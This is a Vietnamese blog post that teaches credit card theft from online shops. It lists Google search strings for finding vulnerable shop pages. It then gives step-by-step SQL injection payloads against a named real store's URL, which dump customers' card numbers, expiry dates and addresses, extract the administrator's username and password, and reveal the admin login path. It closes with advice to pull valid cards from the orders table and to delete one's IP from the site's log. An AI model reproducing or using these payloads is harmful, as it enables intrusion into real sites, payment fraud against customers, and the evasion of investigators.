thấy nhiều chú nhàn rỗi quá, toàn ngồi chờ post cc để ăn thôi
nên post bài này để cho các chú chỉ việc copy và paste
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Quote:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'wow đẹp quá thử thêm cái ' xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'ố là la cái j thế này
Quote:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Quote:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Quote:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Quote:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Quote:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
lưu ý: quay lại trang admin vào Log History xóa cái ip của mình đi đừng hỏi cái này
1 nhận xét:
em muon hoi anh ve cac reg acc o skype.com
Đăng nhận xét